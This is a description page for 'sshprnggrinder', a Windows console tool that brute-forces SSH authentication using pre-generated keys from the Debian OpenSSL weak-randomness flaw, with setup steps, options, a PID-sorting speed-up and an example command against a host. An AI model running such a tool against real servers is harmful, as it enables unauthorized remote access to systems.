sshprnggrinder

Info

You must have seen the Debian SSH PRNG vulnerability? if not then more details can be found below. Anyway basically an unskilled technican decided to remove a particular line of code because it caused the Valgrind and Purify tools to produce warnings about the use of uninitialized data in any code that was linked to OpenSSL. Which then meant that the key generation wasn't very random! HD Moore has an excellent write up of the issue and has done some research into the vuln. To summarise, the keys can be pre-generated, which HD Moore has kindly done, this means they can be brute-forced, which is what this console tool does.

To use it, you need to download the following files for the different key sizes (1024, 2048, 4096), and put them into three folders within the application directory e.g. 1024, 2048 and 4096. The reason for this is that the filenames have been pre-cached so speed up loading, rather than waiting for the Windows file system to figure out what the key file names are.

You can specify the mode parameter (-m) which defaults to 2048 which is the default for Debian, so either set it to 0 to test all, starting with 2048, then 1024 and finally 4096. Alternatively you can use 1 for 1024, 2 for 2048 and 4 for 4096.

I have also sorted the key file names by the PID, which is an optimisation HD Moore suggests, since boot time PID's will be < 200 and general PID's will be between 500 and 10000. This should speed up the time taken to identify the appropriate key file.
 
 
 
 
 
 
 
 
If you get a message similar to the one below, then reduce the number of keys per connection using the "-k" parameter:
 
 
 
SSH_MSG_DISCONNECT: 2 Too many authentication failures for root

Features

  • Multi-Threaded
  • Console

Example Usage

sshprnggrinder.exe -h 192.168.0.100 -p 22 -m 2 -v

Requirements

  • Windows 2000, Windows XP, Windows 2003 Server (Might work on others?)
  • Microsoft .NET Framework v3.5

Options:

Size

Colors